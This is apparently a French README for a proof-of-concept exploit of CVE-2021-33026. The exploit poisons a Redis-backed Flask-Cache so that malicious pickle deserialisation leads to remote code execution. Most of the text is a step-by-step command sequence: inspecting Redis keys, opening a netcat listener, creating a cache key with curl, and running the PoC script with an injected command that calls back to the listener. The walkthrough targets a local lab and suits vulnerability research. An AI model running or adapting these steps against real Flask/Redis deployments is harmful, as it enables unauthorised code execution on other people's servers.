
Exploit PoC pour CVE-2021-33026 qui empoisonne le cache Redis dans Flask-Cache pour réaliser une exécution de code à distance via une désérialisation pickle malveillante.
Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit
Vérifier que le serveur Redis est en ligne
redis-cli -h 127.0.0.1 -p 6379 ping
redis-cli keys *
redis-cli get [Keyid]
Démarrer l'écoute netcat sur le port 10001 :
nc -nvlp 10001
Configuration de l'environnement pour Flask Cache
python -m venv venv_flask_cache_<lib_ver>
source venv_flask_cache_<lib_ver>\scripts\activate
pip install -r <requirement.txt>
Configuration de l'environnement pour Flask Cache 2.3.0
Exécuter l'application Flask et créer une clé de cache :
flask run
curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new
Récupérer la valeur de la clé de cache depuis l'application Flask
curl --request GET http://localhost:5000/cache/[key]
Exploitation de Flask Cache en empoisonnant le cache Redis :
cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a